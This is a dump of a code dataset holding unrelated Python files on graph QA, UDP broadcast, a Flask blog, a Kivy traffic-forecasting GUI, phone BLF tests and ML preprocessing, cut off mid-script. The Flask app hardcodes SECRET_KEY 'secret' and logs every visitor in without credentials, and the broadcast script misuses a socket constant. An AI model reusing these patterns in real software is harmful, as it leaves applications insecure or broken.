0:\n\t\t\t\t\tsource_rel_col_index = 0\n\t\t\t\t\ttarget_rel_col_index = 2\n\t\t\t\telse:\n\t\t\t\t\tsource_rel_col_index = 2\n\t\t\t\t\ttarget_rel_col_index = 0\n\n\t\ttarget_ids = []\n\t\tfor rel in graph.triples:\n\t\t\tif rel[0][1] == relation_type:\n\t\t\t\tif rel[0][source_rel_col_index] == entity_id:\n\t\t\t\t\ttarget_ids.append(rel[0][target_rel_col_index])\n\n\t\ttarget_items = []\n\t\tfor ent in graph.entities:\n\t\t\tif ent[1] == target_type:\n\t\t\t\tfor tar_id in target_ids:\n\t\t\t\t\tif ent[0] == tar_id:\n\t\t\t\t\t\ttarget_items.append(ent)\n\t\ttarget_props = [item['properties'] for item in graph.schema if item['type'] == 'entity' and item['concept'] == target_type]\n\t\ttarget_cols = [item['name'] for item in target_props[0]]\n\t\tres = []\n\t\tfor item in target_items:\n\t\t\ttmp = {}\n\t\t\tfor key, value in zip(target_cols, item[2]):\n\t\t\t\ttmp[key] = value\n\t\t\tres.append(tmp)\n\t\tif question_type == 'entity':\n\t\t\treturn res\n\t\telif question_type == 'quantity':\n\t\t\treturn len(res)\n\n\tdef fetch_by_db_query(self, graph_db) -> T:\n\t\t\"\"\" fetch the answer through querying outside knowledge databases \"\"\"\n\t\tfinal_answers = []\n\t\tfor sql_ in self.struc_q.neo_sqls:\n\t\t\tquestion_type = sql_['type']\n\t\t\tqueries = sql_['sql']\n\t\t\tanswers = []\n\t\t\tfor query in queries:\n\t\t\t\tress = graph_db.run(query).data()\n\t\t\t\tanswers += ress\n\t\t\tfinal_answers.append(answers)\n\t\treturn final_answers\n\n\tdef fetch_by_similarity(self, embeddings) -> T:\n\t\t\"\"\" \n\t\tfetch the answer through calculating vector similarities \n\t\trefer to paper: Knowledge Graph Embedding Based Question Answering, WSDM 2019\n\n\t\t\"\"\"\n\t\tif not self.struc_q_embed_check():\n\t\t\treturn None\n\n\t\telse:\n\t\t\t# should calculate embedding similarities between question and graph nodes\n\t\t\t# match entity name in MTG graph to filter a smaller set of candidates\n\t\t\tmatched_ids = entity_name_match(self.struc_q.entities, self.graph)\n\t\t\t# further calculate distances between question entity embeddings and graph embeddings\n\t\t\tsimilarities = euclidean_distances(self.struc_q.q_entity_embed * len(matched_ids), embeddings[matched_ids], squared=True).argsort(axis=1)\n\t\t\t# get the shortest distance entity id\n\t\t\tindex_top = sort_with_index(similarities)[0]\n\t\t\t# use relation function to calculate the target entity embedding\n\t\t\ttarget_embed = relation_func(self.struc_q.q_entity_embed[index_top], self.struc_q.q_relation_embed)\n\t\t\t# find the closest target entity id\n\t\t\tclosest_target_id = find_closest(target_embed, embeddings)\n\t\t\t# get the target entity object\n\t\t\tanswer = [ent for ent in self.graph.entities if ent[0] == closest_target_id][0]\n\t\t\treturn answer\n\n\ndef entity_name_match(entities, graph):\n\treturn NotImplemented\n\ndef sort_with_index(value_array):\n\treturn NotImplemented\n\ndef relation_func(head, relation):\n\treturn NotImplemented\n\ndef find_closest(embed, embeddings):\n\treturn NotImplemented\n\n\n","sub_path":"openks/apps/qa/answer_fetcher.py","file_name":"answer_fetcher.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"529799702","text":"import socket\r\n\r\ndest = ('<broadcast>', 7788)\r\n\r\n# 创建udp套接字\r\n\r\ns = socket.socket(socket.AF_INET, socket.SO_BROADCAST, 1)\r\n\r\n# 对这个需要发送广播的套接字进行修改设置\r\n\r\ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n# 以广播形式发送数据到本网络的所有电脑中\r\ns.sendto(b\"Hi\", dest)\r\n\r\nprint(\"等待对方回复(exit退出)\")\r\n\r\nwhile True:\r\n (buf, address) = s.recvfrom(2048)\r\n print(\"Received from %s: %s\" % (address, buf))\r\n","sub_path":"网络编程/网络编程中的广播.py","file_name":"网络编程中的广播.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"327137921","text":"\n\n# 生成器\n# a = (row for row in range(10))\n# print(next(a))\n\n\nimport redis\n\nr = redis.Redis(host=\"\", port=6379)\n\nuser_cart = r.keys(\"1_3_*\")\nprint(user_cart)\n\n\na = {\n \"a\": 1,\n \"b\": 1\n}\n\nprint(sum(a.values()))","sub_path":"20171010/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"163449498","text":"\nfrom flask import Flask, render_template_string, redirect\nfrom sqlalchemy import create_engine, MetaData\nfrom flask_login import UserMixin, LoginManager, \\\n login_user, logout_user\nfrom flask_blogging import SQLAStorage, BloggingEngine\nfrom flask import render_template\nimport os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = \"secret\" # for WTF-forms and login\napp.config[\"BLOGGING_URL_PREFIX\"] = \"/blog\"\napp.config[\"BLOGGING_DISQUS_SITENAME\"] = \"test\"\napp.config[\"BLOGGING_SITEURL\"] = \"https://android-flask-academy.herokuapp.com\"\napp.config['DATABASE_URL']='DATABASE_URL'\nSQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, 'app.db')\n# extensions\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\nmeta = MetaData()\nsql_storage = SQLAStorage(engine, metadata=meta)\nblog_engine = BloggingEngine(app, sql_storage)\nlogin_manager = LoginManager(app)\nmeta.create_all(bind=engine)\n\n# user class for providing authentication\nclass User(UserMixin):\n def __init__(self, user_id):\n self.id = user_id\n\n def get_name(self):\n return \"sammy Mutahi\" # typically the user's name\n\n@login_manager.user_loader\n@blog_engine.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n\n# @app.route(\"/\")\n# def index():\n# return render_template('index.html')\n\n@app.route(\"/\")\ndef login():\n user = User(\"testuser\")\n login_user(user)\n return redirect(\"/blog\")\n\n@app.route(\"/logout/\")\ndef logout():\n logout_user()\n return redirect(\"/\")\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373439458","text":"import xbmcgui\n\ndef display_error_message(\n message,\n title=\"Projector Command Failed\",\n type_=xbmcgui.NOTIFICATION_ERROR,\n time=1000,\n sound=True):\n \"\"\"Display an error message in the Kodi interface\"\"\"\n display_message(message, title=title, type_=type_, time=time, sound=sound)\n\ndef display_message(\n message, \n title=\"Report from projector\", \n type_=xbmcgui.NOTIFICATION_INFO,\n time=5000,\n sound=False):\n \"\"\"Display an informational message in the Kodi interface\"\"\"\n\n dialog = xbmcgui.Dialog()\n dialog.notification(\n title, \n message,\n type_,\n time,\n sound)\n\n","sub_path":"lib/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"473094202","text":"from kivy.app import App\n\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.spinner import Spinner, SpinnerOption\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.popup import Popup\nfrom datepicker import DatePicker\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import NumericProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty\nfrom kivy.uix.image import Image\nfrom kivy.uix.progressbar import ProgressBar \nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.recyclegridlayout import RecycleGridLayout\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\nfrom kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg\nfrom kivy.garden.mapview import MapView, MapMarker\nfrom kivy.clock import Clock\nfrom tkinter.messagebox import showerror\nimport tkinter as tk\n\nfrom train import Train, RegionSelector\nfrom threading import Thread\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom kivy.clock import mainthread\nfrom datetime import datetime\n\n\ntk.Tk().withdraw()\nfile_name=\"results.csv\"\ndatetime_format = \"%d-%m-%Y %H:%M\"\n\nclass MapApp(App):\n \n def build(self):\n self.default_title = \"Trafik Akis Hizi Tahmini\" \n self.title = self.default_title\n sm = ScreenManager()\n\n home = HomeScreen(name=\"home\")\n hyper = HyperScreen(self, name='hyper')\n train = TrainScreen(name=\"train\")\n results = ResultsScreen(name='res')\n\n \n\n sm.add_widget(hyper)\n sm.add_widget(train)\n sm.add_widget(results)\n sm.add_widget(home)\n \n sm.current = \"home\"\n \n return sm\n \n\nclass HyperScreen(Screen):\n\n def __init__(self, app,*args, **kwargs):\n super(HyperScreen, self).__init__(*args, **kwargs)\n self.app = app\n self.regions = RegionSelector()\n self.settings_popup = SettingsPopUp()\n self.preprocess_popup = PreprocessPopup()\n self.markers = {}\n self.current_marker_id = -1\n self.ids.region.values = self.regions.get_provinces()\n \n def settings_button_click(self):\n self.settings_popup.open()\n\n def check_parameters_for_train(self):\n if self.current_marker_id == -1:\n showerror(\"HATA\", \"Lutfen bolge seciniz\")\n return False\n \n elif self.markers[self.current_marker_id].default_source == \"./marker_ims/red.png\":\n showerror(\"HATA\", \"Sectiginiz bolgede yeterli veri yok. Kirmizi veri noktalari secilememektedir.\")\n return False\n\n elif self.settings_popup.ids.epoch.text == \"\":\n showerror(\"HATA\", \"Epoch sayisi bos olamaz\")\n return False\n \n elif self.settings_popup.ids.time_step.text == \"\":\n showerror(\"HATA\", \"Zaman sekansi boyutu bos olamaz\")\n return False\n\n elif self.settings_popup.ids.batch.text == \"\":\n showerror(\"HATA\", \"Batch boyutu bos olamaz\")\n return False\n\n train_start_date = datetime.strptime(self.ids.train_start.text + \" 00:00\", datetime_format)\n train_end_date = datetime.strptime(self.ids.train_end.text + \" 00:00\", datetime_format)\n test_start_date = datetime.strptime(self.ids.test_start.text + \" 00:00\", datetime_format)\n test_end_date = datetime.strptime(self.ids.test_end.text + \" 00:00\", datetime_format)\n \n if train_end_date < train_start_date or test_end_date < test_start_date:\n showerror(\"HATA\", \"Baslangic tarihleri bitis tarihlerinden once olmalidir\")\n return False\n \n else:\n return True\n\n def start_train_button(self):\n if self.check_parameters_for_train() == False:\n return\n \n self.manager.screens[1].ids.progress.max = int(self.settings_popup.ids.epoch.text)\n self.manager.screens[1].ids.progress.value = 0\n self.manager.current = self.manager.screens[1].name\n self.app.title = self.build_result_title()\n self.weekday = True\n if self.settings_popup.ids.day.text == 'Hayir':\n self.weekday = False\n \n self.daypart = True\n if self.settings_popup.ids.daypart.text == \"Hayir\":\n self.daypart = False\n \n self.prev_weeks = 0\n if self.settings_popup.ids.prev_weeks.text == \"1 ve 2 hafta\":\n self.prev_weeks = 1\n elif self.settings_popup.ids.prev_weeks.text == \"1, 2 ve 3 hafta\":\n self.prev_weeks = 2\n self.train_thread = Thread(target=self.fit, args=(int(self.settings_popup.ids.epoch.text),))\n self.train_thread.setDaemon(True)\n self.train_thread.start()\n\n def fit(self, epochs): \n train_loss_history = []\n test_loss_history = []\n epoch_history = {\"train\": train_loss_history, \"test\":test_loss_history}\n id = self.regions.find_id_from_address(self.ids.sensor.text)\n source_name = RegionSelector.build_file_name(self.ids.region.text, id)\n \n if RegionSelector.check_data_exist(source_name) == False:\n self.preprocess_popup.open()\n RegionSelector.pull_data_from_database(id, self.ids.region.text)\n RegionSelector.preprocess(id, self.ids.region.text, self.preprocess_popup)\n self.preprocess_popup.dismiss()\n\n self.train_object = Train(\n source_name,\n self.weekday, \n self.ids.train_start.text,\n self.ids.train_end.text,\n self.ids.test_start.text,\n self.ids.test_end.text,\n int(self.settings_popup.ids.time_step.text),\n self.prev_weeks,\n self.daypart\n ) \n for i in range(epochs):\n temp_train, temp_test = self.train_object.fit(\n int(self.settings_popup.ids.batch.text)\n )\n epoch_history[\"train\"].append(temp_train)\n epoch_history[\"test\"].append(temp_test)\n self.manager.screens[1].update_results(epoch_history, i+1, epochs)\n self.manager.screens[1].ids.progress.value = i+1\n \n self.train_object.save_estimations(file_name)\n self.manager.screens[2].get_dataframe()\n self.manager.screens[1].ids.results.disabled = False\n self.manager.screens[1].ids.home.disabled = False\n self.build_result_title()\n self.unpin_map()\n self.reset_spinners()\n self.reset_map_zoom()\n self.current_marker_id = -1\n\n def pin_map(self):\n self.ids.sensor.text = \"Sensor Seciniz\"\n self.unpin_map()\n self.ids.sensor.values = []\n sensors = self.regions.get_sensors(self.ids.region.text)\n for index, row in sensors.iterrows():\n file = RegionSelector.build_file_name(self.ids.region.text, row.ID)\n exists = RegionSelector.check_data_exist(file)\n marker = MyMarker(self, row.percentage, exists, row.address, lon=row.long, lat=row.lat)\n self.markers[row.ID] = marker\n self.ids.map.add_marker(marker)\n self.ids.sensor.values.append(row.address)\n self.reset_map_zoom()\n avg_lat, avg_lon = self.get_center_of_markers()\n self.ids.map.lat = avg_lat\n self.ids.map.lon = avg_lon\n self.ids.map.zoom = 12\n\n def focus_marker(self):\n id = self.regions.find_id_from_address(self.ids.sensor.text)\n self.markers[id].source = \"./marker_ims/blue.png\"\n self.current_marker_id = id\n\n def release_marker_focus(self):\n self.markers[self.current_marker_id].source = self.markers[self.current_marker_id].default_source\n self.current_marker_id = -1\n\n def get_center_of_markers(self):\n if len(self.markers) == 0:\n return 41.091602, 29.066435\n avg_lat = 0\n avg_lon = 0\n for marker in self.markers.values():\n avg_lat += marker.lat\n avg_lon += marker.lon\n avg_lat /= len(self.markers)\n avg_lon /= len(self.markers)\n return avg_lat, avg_lon\n\n def reset_map_zoom(self):\n self.ids.map.lat = 41.091602\n self.ids.map.lon = 29.066435\n self.ids.map.zoom = 10\n\n def build_result_title(self):\n return self.ids.sensor.text + \"/\" + self.ids.region.text\n \n def unpin_map(self):\n if len(self.markers) > 0:\n for marker in self.markers.values():\n self.ids.map.remove_marker(marker)\n self.markers = {}\n\n def reset_spinners(self):\n self.ids.region.text = \"Bolge Seciniz\"\n self.ids.sensor.text = \"Sensor Seciniz\"\n self.ids.sensor.values = []\n\n def on_sensor_spinner_text_change(self):\n if self.manager.current == \"hyper\":\n if self.current_marker_id != -1:\n self.release_marker_focus()\n \n if self.ids.sensor.text != \"Sensor Seciniz\":\n self.focus_marker()\n \nclass SettingsPopUp(Popup):\n pass\n\n\nclass TrainScreen(Screen):\n\n def update_results(self, epoch_history, current_epoch, max_epoch): \n self.ids.header.text = \"EPOK: \" + str(current_epoch) + \"/\" + str(max_epoch)\n self.save_epoch_history_figure(epoch_history, current_epoch, max_epoch)\n self.update_image()\n epoch_info_text = \"Eğitim MAPE: \" + str(round(epoch_history[\"train\"][current_epoch-1],3)) + \"\\n\"\n epoch_info_text += \"Test MAPE: \" + str(round(epoch_history[\"test\"][current_epoch-1],3))\n self.ids.result.text = epoch_info_text\n\n def see_all_results_button_click(self):\n self.manager.current = self.manager.screens[2].name\n\n @mainthread\n def update_image(self):\n self.ids.graph.source = self.fig_path\n\n def go_back_button(self):\n self.reset_screen()\n self.manager.screens[0].app.title = self.manager.screens[0].app.default_title\n self.manager.screens[1].ids.results.disabled = True\n self.manager.screens[1].ids.home.disabled = True\n self.manager.current = \"hyper\"\n \n def save_epoch_history_figure(self, epoch_history, current_epoch, max_epoch):\n indexes = [i for i in range(1, 1 + len(epoch_history[\"train\"]))]\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_axes([0.1,0.1,0.8,0.8])\n ax.set_xlim([1,max_epoch])\n ax.set_ylim([0,100])\n plt.title(label=\"Epok Gecmisi\")\n ax.plot(indexes, epoch_history[\"train\"], label=\"Eğitim MAPE\")\n ax.plot(indexes, epoch_history[\"test\"], label=\"Test MAPE\")\n ax.legend()\n self.fig_path = \"epoch_his/fig_\" + str(current_epoch) + \".png\" \n fig.savefig(self.fig_path) \n ax.cla()\n\n @mainthread\n def reset_screen(self):\n self.fig_path = \"epoch_his/default.png\"\n self.update_image()\n self.ids.header.text = \"Ilk epok sonuclari bekleniyor\"\n self.ids.result.text = \"\"\n\n\nclass ResultsScreen(Screen):\n\n frame_list = ObjectProperty()\n column_headings =ObjectProperty()\n rv_data = ListProperty([]) \n \n def __init__(self, **kwargs):\n super(ResultsScreen, self).__init__(**kwargs)\n\n self.column_headings.add_widget(Label(text=\"Tarih\"))\n self.column_headings.add_widget(Label(text=\"Gercek Deger\"))\n self.column_headings.add_widget(Label(text=\"Tahmin\"))\n\n def get_dataframe(self):\n df = pd.read_csv(file_name)\n data = []\n for row in df.itertuples():\n for i in range(1, len(row)):\n data.append([row[i], row[0]])\n self.rv_data = [{'text': str(x[0]), 'Index': str(x[1]), 'selectable': True} for x in data]\n\n def go_back_button(self):\n self.manager.current = \"train\"\n\n def go_home_button(self):\n self.manager.screens[0].app.title = self.manager.screens[0].app.default_title\n self.manager.screens[1].ids.results.disabled = True\n self.manager.screens[1].ids.home.disabled = True\n self.manager.screens[1].reset_screen()\n self.manager.current = \"home\"\n\n\nclass HomeScreen(Screen):\n \n def go_to_hyper_screen(self):\n self.manager.current = self.manager.screens[0].name\n\n\nclass MyMarker(MapMarker):\n\n def __init__(self, screen, percentage,has_data, address,*args, **kwargs):\n super(MyMarker, self).__init__(*args, **kwargs)\n self.screen = screen\n if percentage < 80:\n self.source = \"./marker_ims/red.png\"\n elif has_data:\n self.source = \"./marker_ims/green.png\"\n else:\n self.source = \"./marker_ims/yellow.png\"\n self.default_source = self.source\n self.address = address\n \n def update_sensor_spinner_text(self):\n self.screen.ids.sensor.text = self.address\n\n\nclass PreprocessPopup(Popup):\n pass\n\n\nMapApp().run()\n\n","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":12923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199236070","text":"import math\n\ndef average(x):\n assert len(x) > 0\n return float(sum(x)) / len(x)\n\ndef pearson_def(x, y):\n assert len(x) == len(y)\n n = len(x)\n assert n > 0\n avg_x = average(x)\n avg_y = average(y)\n diffprod = 0\n xdiff2 = 0\n ydiff2 = 0\n for idx in range(n):\n xdiff = x[idx] - avg_x\n ydiff = y[idx] - avg_y\n diffprod += xdiff * ydiff\n xdiff2 += xdiff * xdiff\n ydiff2 += ydiff * ydiff\n\n return diffprod / math.sqrt(xdiff2 * ydiff2)\n\t\nfrom collections import namedtuple\nfrom gensim.models import doc2vec\n# Load data\n\n#doc1 = [\"This is a sentence\", \"This is another sentence\"]\na=input(\"Enter the First sentence: \")\nb=input(\"Enter the Second sentence: \")\ndoc1=[a,b]\n# Transform data (you can add more data preprocessing steps) \n\ndocs = []\nanalyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\nfor i, text in enumerate(doc1):\n words = text.lower().split()\n tags = [i]\n docs.append(analyzedDocument(words, tags))\n\n# Train model (set min_count = 1, if you want the model to work with the provided example data set)\n\nmodel = doc2vec.Doc2Vec(docs, size = 100, window = 300, min_count = 1, workers = 4)\n\n\n\nresult=\tpearson_def(model.docvecs[0],model.docvecs[1])+1\n#result=\tpearson_def(a,b)+1\n#result1 = 1 - spatial.distance.cosine(model.docvecs[0],model.docvecs[1])\nprint(result)","sub_path":"Pearson similarity/Pearson.py","file_name":"Pearson.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"192983689","text":"import xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\nimport glob\n\n\nclasses = [\"surgicaltool\"]\n\n\ndef convert(size, box):\n dw = 1./size[0]\n dh = 1./size[1]\n x = (box[0] + box[1])/2.0\n y = (box[2] + box[3])/2.0\n w = box[1] - box[0]\n h = box[3] - box[2]\n x = x*dw\n w = w*dw\n y = y*dh\n h = h*dh\n return (x,y,w,h)\n\ndef convert_annotation(annotation, text_path):\n in_file = open(annotation)\n tree=ET.parse(in_file)\n root = tree.getroot()\n file_name, _ = os.path.splitext(root.find('filename').text)\n out_file = open(txt_path+file_name+'.txt', 'w')\n size = root.find('size')\n w = int(size.find('width').text)\n h = int(size.find('height').text)\n\n for obj in root.iter('object'):\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult) == 1:\n continue\n cls_id = classes.index(cls)\n xmlbox = obj.find('bndbox')\n b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))\n bb = convert((w,h), b)\n out_file.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\nxml_path = '/home/ankit.gupta/tool_detect_yolo/dataset/train_annot_folder/'\ntxt_path = '/home/ankit.gupta/yolo_pytorch/pytorch-0.4-yolov3/data/annotations_txt/'\ndataset = '/home/ankit.gupta/yolo_pytorch/pytorch-0.4-yolov3/data/'\nsplit_ratio = 0.2\n\nif not os.path.exists(txt_path):\n os.mkdir(txt_path)\nannotations_xml = glob.glob(xml_path+'*.xml')\nlist_file_train = open(dataset + 'train.txt', 'w')\nlist_file_valid = open(dataset + 'valid.txt', 'w')\nsample_factor = int(1/split_ratio)\nfor i in range(len(annotations_xml)):\n tree=ET.parse(annotations_xml[i])\n root = tree.getroot()\n image_id = root.find('path').text\n if (i+1)%sample_factor == 0:\n list_file_valid.write(image_id+'\\n')\n else:\n list_file_train.write(image_id+'\\n')\n convert_annotation(annotations_xml[i], txt_path)\n","sub_path":"scripts/voc_label.py","file_name":"voc_label.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"351368464","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py\n\nPurpose:\n This test case verifies the DUT using BLF line key to call the monitored\n user. Pressing the line key for a monitored user in Idle state should\n result in a call to the monitored user's extension.\n\nAuthor:\n Anuradha N(anakre@cisco.com)\n\nReferences:\n BW-SIPPhone-FunctionalTestPlan-R21.0\n US25693\n\nDescription:\n Originate a call from the DUT to one of the DUT's monitored user by\n pushing the line key for the monitored user. Answer the call.\n\nTopology:\n 1. 2 3pcc phones.\n 2. Both the phones should register successfully before running the script\n 3. BLF should be configured on monitoring user phone.\n 4. Make sure at least 1 user is added as monitored user.\n 5. Create a call pickup group by browsing to Services->Resources and\n ensure that DUT and monitored users are added.\n\nPass/Fail Criteria:\n 1. Check that the lamp state is fast blinking red when the monitored user\n is ringing\n 2. Check that the lamp state is solid red when the user is connected\n 3. Check that the lamp state is steady and green when monitored user is\n idle.\n\nTest Steps:\n 1. DUT (Phone A) calls phone B by pushing the line key for Phone B\n 2. Phone B answers the call after few rings.\n 3. Phone A and Phone B are connected.\n 4. DUT disconnects the call.\n\n Verify:\n 1. Phone B rings\n 2. DUT monitored line lamp for Phone B is Fast blinking red(inbound\n alerting)\n 3. Phone B answers the call.\n 4. Phone B and Phone A are connected\n 5. DUT monitored line lamp for Phone B is solid red\n 6. DUT disconnects the call\n 7. DUT monitored line lamp for Phone B is green/off\n\nNotes:\n\nKnown Bugs:\n\n\"\"\"\n\nimport tng\nimport logging\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended \\\n import wait_for_ccapi_call_states, poll_feature_state\nfrom tng_sl.plugins.synergylite_3pcc_ui import SynergyLite3pccUiHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\n\nlog = logging.getLogger('BlfCallMonitoredUser')\n\n\nclass BlfCallMonitoredUser(SetupHelpersTestCase, tng.api.TestCase):\n helpers = (\n PhoneConfigHelper, PhoneLineRegHelper, TsharkHelper,\n BroadsoftLoginHelper)\n helper_num_devices = 2\n\n def setUp(self):\n log.info(\"Start of setUp method\")\n\n self.serverproxy = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"as_ip_addr\")\n\n self.proxy = self.phone_data['proxy']\n self.xsi_user_id1 = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"xsi_user_id1\")\n self.xsi_user_id2 = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"xsi_user_id2\")\n self.uri_name = '{}_blf@{}'.format(self.user_id1, self.proxy)\n\n self.broadsoft = BroadsoftConfig()\n log.info(\"Enable busy lamp field in the server\")\n self.broadsoft.set_busy_lamp_field(\n list_uri=self.uri_name,\n blf_monitored_user_id=[self.xsi_user_id2],\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n def broadsoft_cleanup():\n log.info(\"CleanUp configured BLF from the server\")\n self.broadsoft.set_busy_lamp_field(\n list_uri=self.uri_name, blf_monitored_user_id=[],\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n self.addCleanup(broadsoft_cleanup)\n\n self.call_pickup_group = self.bsoft_web.create_callpickup_group(\n [self.user_id2, self.user_id1])\n\n def broadsoft_delete_callpickup_group():\n self.bsoft_web.delete_callpickup_group(self.call_pickup_group)\n\n self.addCleanup(broadsoft_delete_callpickup_group)\n\n log.info(\"End of setUp method\")\n\n def test_blf_call_monitored_user(self):\n\n log.info(\"Start of test_blf_call_monitored_user\")\n\n self.oPhone1.ui.set_web_parameter_http(\n BLF_List_Uri=['Att Console', 'BLF List URI', self.uri_name],\n Use_line_keys=['Att Console', 'Use Line Keys For BLF List', 1])\n\n list_uri_name, use_line_keys = self.oPhone1.get_web_config(\n 'BLF_List_URI', 'Use_Line_Keys_For_BLF_List')\n\n self.assertEqual(self.uri_name, list_uri_name)\n self.assertEqual(\"Yes\", use_line_keys)\n\n filter_cmd = (\n 'port sip and (host {} or host {})'.format(\n self.oPhone1.ip, self.oPhone2.ip))\n log.info('Start tshark on linux with filter {}'.format(filter_cmd))\n capture_file = self.tshark.tshark_start(filter_cmd)\n\n log.info(\n 'Phone A calls phone B {} by pressing monitored line key'.format(\n self.user_id2))\n self.oPhone1.ccapi.sendKey(SynergyLite3pccUiHelper.PK_LN2, 1, '0000')\n wait_for_ccapi_call_states(self.devices, ('PROCEEDING', 'RINGING'))\n\n log.info('Check for Phone B ALERTING state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['ALERTING', 'RED', 'FAST_BLINK'])\n\n log.info('Phone B accepts the call')\n self.oPhone2.ccapi.accept('0000')\n wait_for_ccapi_call_states(self.devices, ('CONNECTED', 'CONNECTED'))\n log.info('Check for Phone B INUSE state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['INUSE', 'RED', 'STEADY'])\n\n log.info('Phone A ends the call')\n self.oPhone1.ccapi.hangUp('0000')\n wait_for_ccapi_call_states(self.devices, ('IDLE', 'IDLE'))\n log.info('Check for Phone B IDLE state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['IDLE', 'GREEN', 'STEADY'])\n\n log.info('Stop tshark on linux')\n self.tshark.tshark_stop()\n log.info('End of test_blf_call_monitored_user')\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Functional/cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py","file_name":"cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20639538","text":"import re\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport time\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import mean_squared_error\n\nloss = []\nfor i in range(500):\n print(\"Epoch: \",i)\n PERTUBTIME = 2\n A_data_len = [67 ,100 ,100 ,100]\n feat_data = pd.read_csv(\"TSfeatA1Benchmark.csv\",index_col = 0)\n lab_data = pd.read_csv(\"A1_Label.csv\",index_col = 0)\n feat_data = feat_data.values\n lab_data = lab_data.values\n mean_thre = np.reshape(((lab_data[:,-1] + lab_data[:,-2])/2),(-1,1))\n lab_data = np.append(lab_data,mean_thre,axis = 1)\n #Prepare for final training data\n training_data = np.array([])\n feat_data_reglab = np.append(feat_data,mean_thre,axis = 1)\n scaler_Train = MinMaxScaler(feature_range=(-1, 1))\n feat_data_reglab = scaler_Train.fit_transform(feat_data_reglab,(-1,1))\n\n for i in range(A_data_len[0]):\n\n #for unhandling data\n if lab_data[i,0] == 0:\n \n training_data = np.append(training_data,feat_data_reglab[i,:])\n training_data = np.append(training_data,0)\n continue\n\n #for data who didn't utilize X'(t)\n elif lab_data[i,1] == 1:\n\n buffer = np.array([])\n\n for j in 